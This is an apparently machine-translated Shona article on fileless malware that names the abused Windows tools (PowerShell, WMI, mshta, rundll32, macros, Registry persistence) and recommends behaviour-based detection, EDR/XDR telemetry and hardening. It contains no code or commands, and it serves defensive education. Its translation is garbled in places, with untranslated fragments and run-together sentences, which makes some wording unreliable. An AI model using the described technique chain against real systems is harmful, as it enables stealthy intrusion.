Kuziva mafaira asina mafaira: kiyi yekuona uye kudzivirira

Fileless malware inogara mundangariro uye inoshungurudza maturusi ari pamutemo (PowerShell, WMI, LoLBins), zvichiita kuti zviome kuona zvichibva pamafaira.
Chinokosha ndechekutarisa maitiro: kugadzirisa hukama, mitsara yemirairo, Registry, WMI uye network, nemhinduro yekukurumidza pakuguma.
Dziviriro yakaturikidzana inosanganisa kurambidzwa kwemuturikiri, macro manejimendi, chigamba, MFA uye EDR/XDR ine telemetry yakapfuma uye 24/7 SOC.

Kurwiswa kunoshanda pasina kusiya trace pa diski kwave musoro mukuru kune mazhinji zvikwata zvekuchengetedza nekuti ivo vanozviita mundangariro uye vanoshandisa zviri pamutemo maitiro ehurongwa. Saka kukosha kwekuziva nzira yekuziva mafaira asina mafaira uye uzvidzivirire pamberi pavo.

Kupfuura misoro yenyaya uye mafambiro, kunzwisisa mashandiro avanoita, nei vasinganzwisisike, uye zviratidzo zvipi zvinotitendera kuti tizvione zvinoita mutsauko pakati pekuva nechiitiko uye kuzvidemba kukanganisa. Mumitsara inotevera, tinoongorora dambudziko uye tokurudzira mhinduro.

Chii chinonzi fileless malware uye nei zvine basa?

Fileless malware haisi mhuri chaiyo, asi nzira yekushanda: Dzivisa kunyora executables kune dhisiki Inoshandisa masevhisi uye mabhinari atovepo muhurongwa kuita kodhi yakaipa. Panzvimbo yekusiya faira rinogoneka nyore nyore, anorwisa anoshandisa zvisizvo zvinovimbika uye anoisa pfungwa dzayo muRAM.

Maitiro aya anowanzo kuverengerwa muhuzivi hwe'Living off the Land': vanorwisa instrumentalize maturusi emuno akadai sePowerShell, WMI, mshta, rundll32 kana scripting injini seVBScript neJScript kuzadzisa zvinangwa zvavo neruzha rushoma.

Pakati peanonyanya kumiririra maficha tinowana: kuurayiwa mune volatile memory, kushivirira kudiki kana kusavapo pa diski, kushandiswa kwemaitiro-akasaina zvikamu uye yakakwira yekunzvenga inopikisana nemasaini-based injini.

Kunyangwe mitoro mizhinji inonyangarika mushure mekutangazve, usanyengerwa: vadzivisi vanogona kusimbisa kutsungirira nekuisa makiyi eRegistry, kunyoreswa kweWMI, kana mabasa akarongwa, zvese pasina kusiya mabhinari anofungidzirwa pa diski.

Zvinetso pakuona fileless malware

Sei tichiona zvakaoma kuona mafaira asina mafaira?

Chekutanga chipingamupinyi chiri pachena: Iko hakuna mafaera asina kujairika ekuongororaZvirongwa zvechinyakare zveantivirus zvinoenderana nemasiginecha uye kuongororwa kwefaira zvine nzvimbo shoma yekufambisa kana kuuraya kuchigara mumiitiro inoshanda uye pfungwa dzakaipa dzinogara mundangariro.

Chechipiri chakanyanya kujeka: vanorwisa vanozvivharira kumashure zviri pamutemo maitiro ekushandisa systemKana PowerShell kana WMI ichishandiswa zuva nezuva kuita manejimendi, ungasiyanisa sei kushandiswa kwakajairwa kubva mukushandiswa kwakashata pasina mamiriro uye maitiro telemetry?

Uyezve, kuvhara nekuvhara maturusi akakosha hazvigoneke. Kudzima PowerShell kana Hofisi macros mukati mebhodhi inogona kutyora mashandiro uye Hazvidzivisi zvachose kushungurudzwanekuti kune dzakawanda dzimwe nzira dzekuuraya uye matekiniki ekunzvenga zvidhinha zviri nyore.

Kuisa pamusoro pazvo zvese, gore-yakavakirwa kana server-parutivi kuona yakanonoka kudzivirira matambudziko. Pasina chaiyo-nguva yekuonekwa kwenzvimbo mune iyo nyaya ... mitsara yekuraira, kugadzirisa hukama, uye zviitiko zvelogiMumiririri haakwanise kudzikisira panhunzi kuyerera kwakashata kunosiya pasina tsananguro padisiki.

Exclusive content - Click Here Chii chinonzi Telegraph encryption?

Kurwiswa kusina faira kunoshanda sei kubva pakutanga kusvika pakupedzisira

Kuwana kwekutanga kunowanzoitika nemavheji mamwechete senguva dzose: phishing nemagwaro emuhofisi izvo zvinokumbira kugonesa zvirimo, zvinongedzo kumasaiti akakanganisika, kushandiswa kwekusagadzikana mumashandisirwo ari pachena, kana kushungurudzwa kwezvitupa zvakaburitswa kuti uwane kuburikidza neRDP kana mamwe masevhisi.

Kamwe mukati, mupikisi anotsvaga kuuraya asina kubata disc. Kuti vaite izvi, vanobatanidza mashandiro ehurongwa: macros kana DDE mumagwaro iyo yekutanga mirairo, kushandisa mafashama eRCE, kana kudaidza mabhinari akavimbika anobvumira kurodha nekuita kodhi mundangariro.

Kana kushanda kuchida kuenderera mberi, kushingirira kunogona kuitwa pasina kutumira zvitsva zvinotendwa: kutanga zvinyorwa muRegistryKunyoreswa kweWMI kunobata kune zviitiko zvehurongwa kana mabasa akarongwa anokonzeresa zvinyorwa pasi pemamwe mamiriro.

Nekuurayiwa kwakagadzwa, chinangwa chinoraira matanho anotevera: famba mberi, exfiltrate dataIzvi zvinosanganisira kuba zvitupa, kuendesa RAT, migodhi cryptocurrencies, kana activate faira encryption panyaya yeransomware. Zvese izvi zvinoitwa, kana zvichibvira, nekushandisa mashandiro aripo.

Kubvisa humbowo chikamu chechirongwa: nekusanyora mabhinari anofungira, anorwisa anoderedza zvakanyanya zvigadzirwa kuti zviongororwe. kusanganisa basa ravo pakati pezviitiko zvakajairika yehurongwa uye nekudzima zviteshi zvenguva pfupi pazvinogoneka.

tsvaga mafaira asina mafaira

Matekiniki nemidziyo yavanowanzo shandisa

Iyo catalog yakakura, asi inenge inogara ichitenderera kune zvemuno zvinoshandiswa uye nzira dzakavimbika. Aya ndiwo mamwe emamwe akajairika, anogara aine chinangwa che kuwedzera mu-memory execution uye kudzima trace:

PowerShellYakasimba kunyora, kuwana kuWindows APIs, uye otomatiki. Hurukuro hwayo hunoita kuti ive inofarirwa kune ese ari maviri ekutonga uye kushungurudza kushungurudza.
WMI (Windows Management Instrumentation)Inokubvumira kubvunza uye kuita kune zviitiko zvehurongwa, pamwe nekuita zviito zviri kure uye zvemunharaunda; inobatsira kune kushingirira uye kuronga.
VBScript uye JScript: injini dziripo munzvimbo dzakawanda dzinogonesa kuitwa kwepfungwa kuburikidza nehurongwa hwezvikamu.
mshta, rundll32 uye mamwe mabhinari akavimbika: iyo inozivikanwa LoLBins iyo, kana yakanyatsobatanidzwa, inogona gadzira kodhi pasina kudonhedza zvinyorwa zvinoonekwa pa diski.
Zvinyorwa zvine zvinyorwa zvinoshandaMacros kana DDE muHofisi, pamwe nevaverengi vePDF vane maficha epamberi, vanogona kushanda sechitubu chekuvhura mirairo mundangariro.
Windows Registry: self-boot makiyi kana encrypted / yakavanzwa chengetedzo yekubhadhara mitoro inogadziriswa nehurongwa hwezvikamu.
Kubata uye jekiseni muzvirongwa: kugadziridzwa kwenzvimbo yekurangarira yekumhanyisa maitiro e gamuchira pfungwa dzakaipa mukati mezvinoitwa zviri pamutemo.
Operating kits: kucherechedzwa kwekusagadzikana muhurongwa hwemunhu akabatwa uye kutumirwa kweakarongedzerwa maitiro kuti aite kuurayiwa pasina kubata dhisiki.

Dambudziko remakambani (uye nei kungovhara zvese zvisina kukwana)

Maitiro asina ruzivo anoratidza chiyero chakasimba: kuvharira PowerShell, kurambidza macros, kudzivirira mabhinari serundll32. Chokwadi chakanyanya kujeka: Zvizhinji zvezvishandiso izvi zvakakosha. yemazuva ese IT mashandiro uye yekutonga otomatiki.

Exclusive content - Click Here Ita kuti uwane PUP / LPI kuongororwa muAvast! uye AVG

Pamusoro pezvo, vanorwisa vanotsvaga maburi: kumhanyisa injini yekunyora nedzimwe nzira, shandisa mamwe makopiIwe unogona kurongedza logic mumifananidzo kana kutendeukira kune mashoma anotariswa LoLBins. Brute blocking inozopedzisira yagadzira kupokana pasina kupa dziviriro yakakwana.

Chete server-padivi kana gore-yakavakirwa ongororo haigadzirise dambudziko zvakare. Pasina akapfuma endpoint telemetry uye pasina kupindura mumumiririri pachayoSarudzo inouya yanonoka uye kudzivirira hakugoneke nekuti isu tinofanirwa kumirira mutongo wekunze.

Zvichakadaro, mishumo yemusika yagara ichinongedza kukura kwakakosha munzvimbo ino, nepamusoro peiyo Kuedza kushandisa PowerShell zvisina kunaka kwakapetwa kaviri munguva pfupi, izvo zvinosimbisa kuti inzira inodzokororwa uye inobatsira kune vadzivisi.

Kuonekwa kwemazuva ano: kubva pafaira kuenda kune maitiro

Chinokosha hachisi kuti ndiani anouraya, asi sei uye sei. Monitoring the maitiro maitiro uye hukama hwayo Inoita sarudzo: mutsara wekuraira, nhaka yenhaka, inonzwisa API mafoni, inobuda inobatana, Registry shanduko, uye WMI zviitiko.

Iyi nzira inoderedza zvakanyanya kunzvenga nzvimbo: kunyangwe kana mabhinari akabatanidzwa achichinja, iwo maitiro ekurwisa anodzokororwa (zvinyorwa zvinodhawunirodha uye kuita mundangariro, kushungurudzwa kweLoLBins, kukumbira kwevaturikiri, nezvimwewo). Kuongorora iyo script, kwete 'identity' yefaira, inovandudza kuonekwa.

Inoshanda EDR/XDR mapuratifomu anoenderana nemasaini kuti avakezve nhoroondo yakazara yechiitiko, kuratidza iyo mudzi chikonzero Panzvimbo yekupomera maitiro 'akaratidza', rondedzero iyi inobatanidza zvakanamirwa, macros, vaturikiri, miripo, uye kushingirira kudzikamisa kuyerera kwese, kwete chidimbu chakasarudzika.

Kushandiswa kwemaitiro akadai se MITER AT&CK Inobatsira mepu inocherechedzwa matekiniki uye matekiniki (TTPs) uye kutungamira kuvhima kwekutyisidzira kune maitiro ekufarira: kuuraya, kushingirira, kudzivirira kudzivirira, kuwana magwaro, kuwanikwa, lateral kufamba uye kuburitsa.

Chekupedzisira, iyo yekupedzisira yekupindura orchestration inofanirwa kuve nekukurumidza: bvisa mudziyo, magumo maitiro zvinosanganisirwa, dzosera shanduko muRegistry kana basa scheduler uye vhara fungidziro dzinobuda kunze pasina kumirira kusimbiswa kwekunze.

Inobatsira telemetry: chii chekutarisa uye maitiro ekutanga

Kuti uwedzere mukana wekuona pasina kugutsa sisitimu, zvinokurudzirwa kuisa pamberi-kukosha zviratidzo. Mamwe matsime uye zvidzoro zvinopa mamiriro. yakakosha kune fileless Ndizvo:

Yakadzama PowerShell Log nevamwe vaturikiri: script block log, command history, loaded modules, uye AMSI zviitiko, kana zviripo.
WMI RepositoryInventory uye yambiro maererano nekugadzirwa kana kugadziridzwa kwezviitiko mafirita, vatengi, uye zvinongedzo, kunyanya munzvimbo dzine tsitsi dzemazita.
Zviitiko zvekuchengetedza uye Sysmon: process correlation, mufananidzo kutendeseka, ndangariro kurodha, jekiseni, uye kusikwa kweakarongwa mabasa.
Tsvuku: zvinokatyamadza zvinobuda kunze zvinongedzo, kuvheneka, mihoro yekurodha mapatani, uye kushandiswa kwematanho akavanzika ekuburitsa.

Automation inobatsira kupatsanura gorosi kubva kuhundi: hunhu-hwakavakirwa kucherechedzwa mitemo, mvumo ye kutonga zviri pamutemo uye kupfumisa nehungwaru hwekutyisidzira kunodzikamisa manyepo uye kunomhanyisa mhinduro.

Kudzivirira uye kuderedzwa kwepamusoro

Hapana chiyero chimwe chakakwana, asi kudzivirira kwakadzika kunoderedza zvakanyanya njodzi. Padivi rekudzivirira, mitsetse yakawanda yekuita inomira pachena chirimwa mavector uye kuita kuti upenyu hunyanye kuomera muvengi.

Macro management: dzima nekusarudzika uye bvumidza chete kana zvichidikanwa uye zvakasainwa; granular controls kuburikidza nemitemo yeboka.
Kurambidzwa kwevaturikiri neLoLBins: Nyorera AppLocker/WDAC kana yakaenzana, kutonga kwezvinyorwa uye matemplate ekuita ane yakazara matanda.
Patching uye kuderedza: vhara kusashanda zvakanaka uye shandisa ndangariro dziviriro inodzikamisa RCE nemajekiseni.
Kusimbiswa kwakasimbaMFA uye zero misimboti yekuvimba kudzikamisa kushungurudzwa uye kuderedza lateral kufamba.
Kuziva uye kuenzanisaKudzidzira kudzidzisa pa phishing, zvinyorwa zvine zvinoshanda zvemukati, uye zviratidzo zvekuuraiwa zvisina tsarukano.

Exclusive content - Click Here Maitiro ekutsvaga masevhisi paTor network?

Matanho aya anowedzerwa nemhinduro dzinoongorora traffic uye ndangariro kuti vaone huipi hunhu munguva chaiyo, pamwe chete segmentation policy uye neropafadzo shoma dzekuva nemhedzisiro kana chimwe chinhu chatsvedza.

Masevhisi uye nzira dziri kushanda

Munzvimbo dzine akawanda ekupedzisira uye yakanyanya kutsoropodza, yakagadziriswa yekuona uye yekupindura masevhisi ne 24/7 kuongorora Ivo vakaratidza kukurumidza kuvharirwa kwechiitiko. Iko kusanganiswa kweSOC, EMDR/MDR, uye EDR/XDR inopa maziso enyanzvi, telemetry yakapfuma, uye yakarongeka yekupindura masimba.

Ivo vanonyanya kushanda vanopa vakaisa mukati shanduko kune maitiro: lightweight agents izvo correlate chiitiko pane kernel levelIvo vanogadzirazve nhoroondo dzakakwana dzekurwisa uye vanoshandisa otomatiki mitigations kana vaona hutsinye cheni, ine rollback kugona kugadzirisa shanduko.

Mukufanana, endpoint kuchengetedza masutu uye XDR mapuratifomu anobatanidza kuoneka kwepakati uye kutyisidzira manejimendi munzvimbo dzese dzebasa, maseva, zvitupa, email, uye gore; chinangwa ndechekubvisa cheni yekurwisa pasinei nokuti mafaira ari kubatanidzwa here kana kuti kwete.

Zviratidzo zvinoshanda zvekuvhima kwekutyisidzira

Kana iwe uchifanira kukoshesa kutsvaga kwekufungidzira, tarisa pakubatanidza masaini: hurongwa hwehofisi hunotangisa muturikiri ane zvisingawanzo paramita, WMI kunyorera kusikwa Mushure mekuvhura gwaro, gadziridzo kumakiyi ekutanga anoteverwa nekubatanidza kune madomasi ane mukurumbira wakashata.

Imwe nzira inoshanda ndeyekuvimba nehwaro kubva kune yako nharaunda: chii chakajairika pamaseva ako uye nzvimbo dzekushandira? Chero kutsauka (kuchangobva kusainwa mabhinari anoonekwa sevabereki vevaturikiri, kamwe-kamwe spikes mukuita (yezvinyorwa, tambo dzekuraira dzine obfuscation) inofanirwa kuongororwa.

Chekupedzisira, usakanganwe ndangariro: kana uine maturusi anoongorora matunhu anomhanya kana kutora snapshots, izvo zvakawanikwa mu RAM Ivo vanogona kuve humbowo hwechokwadi hwekuita zvisina faira, kunyanya kana pasina maartifacts mufaira system.

Iko kusanganiswa kweaya maitiro, matekiniki, uye zvidzoreso hazvibvisi kutyisidzira, asi kunoisa iwe pachinzvimbo chirinani chekuzviona nenguva. cheka cheni uye kuderedza kukanganisa.

Kana zvese izvi zvikashandiswa zvine hungwaru-endpoint-rich telemetry, maitiro ekubatanidza, mhinduro otomatiki, uye kuomeswa kwakasarudzika-iyo nzira isina faira inorasikirwa nezvakawanda zvayakanakira. Uye, kunyangwe icharamba ichishanduka, kutarisa pamaitiro Panzvimbo pemafaira, zvinopa hwaro hwakasimba hwekudzivirira kwako kushanduka nayo.

Daniel Terrasa

Mharidzo inyanzvi mune tekinoroji uye internet nyaya ine anopfuura makore gumi echiitiko mune akasiyana dhijitari media. Ndakashanda semupepeti uye mugadziri wezvemukati we e-commerce, kutaurirana, online kushambadzira uye kushambadzira makambani. Ndanyorawo pane zvehupfumi, mari uye mamwe masekete mawebhusaiti. Basa rangu ndirowo shungu dzangu. Zvino, kuburikidza nezvinyorwa zvangu mu Tecnobits, Ndinoedza kuongorora nhau dzose nemikana mitsva iyo nyika yetekinoroji inotipa zuva rega rega kuvandudza hupenyu hwedu.